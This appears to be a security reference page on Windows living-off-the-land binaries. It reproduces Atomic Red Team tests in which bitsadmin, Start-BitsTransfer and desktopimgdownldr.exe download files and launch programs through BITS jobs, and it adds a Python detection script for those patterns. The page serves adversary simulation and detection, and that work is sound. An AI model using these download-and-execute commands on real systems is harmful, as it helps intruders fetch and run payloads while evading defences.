LOLbins

Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command-Line Interface, Run window, or via scripts.

Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.

U1004

Detection Rules

attack_technique: T1197
display_name: BITS Jobs
atomic_tests:
- name: Bitsadmin Download (cmd)
  auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: '%temp%\bitsadmin1_flag.ps1'
  executor:
    command: |
      bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
- name: Bitsadmin Download (PowerShell)
  auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to download
    and execute a payload leveraging PowerShell

    Upon execution you will find a GitHub markdown file downloaded to the Temp directory
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: $env:TEMP\bitsadmin2_flag.ps1
  executor:
    command: |
      Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
    cleanup_command: |
      Remove-Item #{local_file} -ErrorAction Ignore
    name: powershell
- name: Persist, Download, & Execute
  auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
  description: |
    This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer and execute a payload in multiple steps.
    Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsadmin to run an executable.
    This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS".
    This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
  supported_platforms:
  - windows
  input_arguments:
    command_path:
      description: Path of command to execute
      type: path
      default: C:\Windows\system32\notepad.exe
    bits_job_name:
      description: Name of BITS job
      type: string
      default: AtomicBITS
    local_file:
      description: Local file path to save downloaded file
      type: path
      default: '%temp%\bitsadmin3_flag.ps1'
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
  executor:
    command: |
      bitsadmin.exe /create #{bits_job_name}
      bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
      bitsadmin.exe /resume #{bits_job_name}
      timeout 5
      bitsadmin.exe /complete #{bits_job_name}
    cleanup_command: |
      del #{local_file} >nul 2>&1
    name: command_prompt
- name: Bits download using desktopimgdownldr.exe (cmd)
  auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
  description: |
    This test simulates using desktopimgdownldr.exe to download a malicious file
    instead of a desktop or lock screen background image. The process that actually makes
    the TCP connection and creates the file on disk is a svchost process ("-k netsvcs -p -s BITS")
    and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: Remote file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
    download_path:
      description: Local file path to save downloaded file
      type: path
      default: 'SYSTEMROOT=C:\Windows\Temp'
    cleanup_path:
      description: path to delete file as part of cleanup_command
      type: path
      default: C:\Windows\Temp\Personalization\LockScreenImage
    cleanup_file:
      description: file to remove as part of cleanup_command
      type: string
      default: "*.md"
  executor:
    command: |
      set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
    cleanup_command: |
      del #{cleanup_path}\#{cleanup_file} >nul 2>&1
    name: command_prompt
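The tests above describe the telemetry a defender can key on: bitsadmin switches that download or register a notification command, a child process whose parent is the BITS service host ("svchost.exe -k netsvcs -p -s BITS"), and desktopimgdownldr.exe pulling a lockscreen URL from a command interpreter. The triage logic below is an added example, not part of this page or of Atomic Red Team; the event field names are generic (map them to your EDR or Sysmon schema) and the sample events are constructed.

```python
"""Triage process-creation events for the BITS abuse patterns the tests describe."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str                  # full path of the created process
    command_line: str
    parent_image: str
    parent_command_line: str


# The service host quoted in the test description as the initiating process.
BITS_HOST = re.compile(r"svchost\.exe\s+-k\s+netsvcs\s+-p\s+-s\s+BITS\b", re.I)
# bitsadmin switches that download a file or register a command to run on completion.
BITSADMIN_SW = re.compile(r"/(transfer|addfile|setnotifycmdline)\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev):
    """Return alert strings for one event; an empty list means nothing notable."""
    alerts = []
    img = basename(ev.image)
    if img == "bitsadmin.exe":
        for sw in BITSADMIN_SW.findall(ev.command_line):
            # /setnotifycmdline is execution, not just a download, so rank it higher.
            sev = "high" if sw.lower() == "setnotifycmdline" else "medium"
            alerts.append(f"{sev}: bitsadmin /{sw.lower()}")
    if BITS_HOST.search(ev.parent_command_line):
        # Any child of the BITS service host is the /setnotifycmdline side effect.
        alerts.append(f"high: BITS service host spawned {img}")
    if (img == "desktopimgdownldr.exe" and "/lockscreenurl:" in ev.command_line.lower()
            and basename(ev.parent_image) in SHELLS):
        # Heuristic (assumption): the OS personalization flow does not launch it from a shell.
        alerts.append("medium: desktopimgdownldr /lockscreenurl from a shell")
    return alerts


# Constructed sample events mirroring the tests; not real telemetry.
SAMPLE = [
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              'bitsadmin.exe /setnotifycmdline AtomicBITS C:\\Windows\\system32\\notepad.exe ""',
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "C:\\Windows\\system32\\notepad.exe",
              r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s BITS"),
    ProcEvent(r"C:\Windows\System32\desktopimgdownldr.exe",
              "desktopimgdownldr.exe /lockscreenurl:https://example.invalid/x.md /eventName:d",
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe",
              r"C:\Windows\explorer.exe", "explorer.exe"),
]
```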
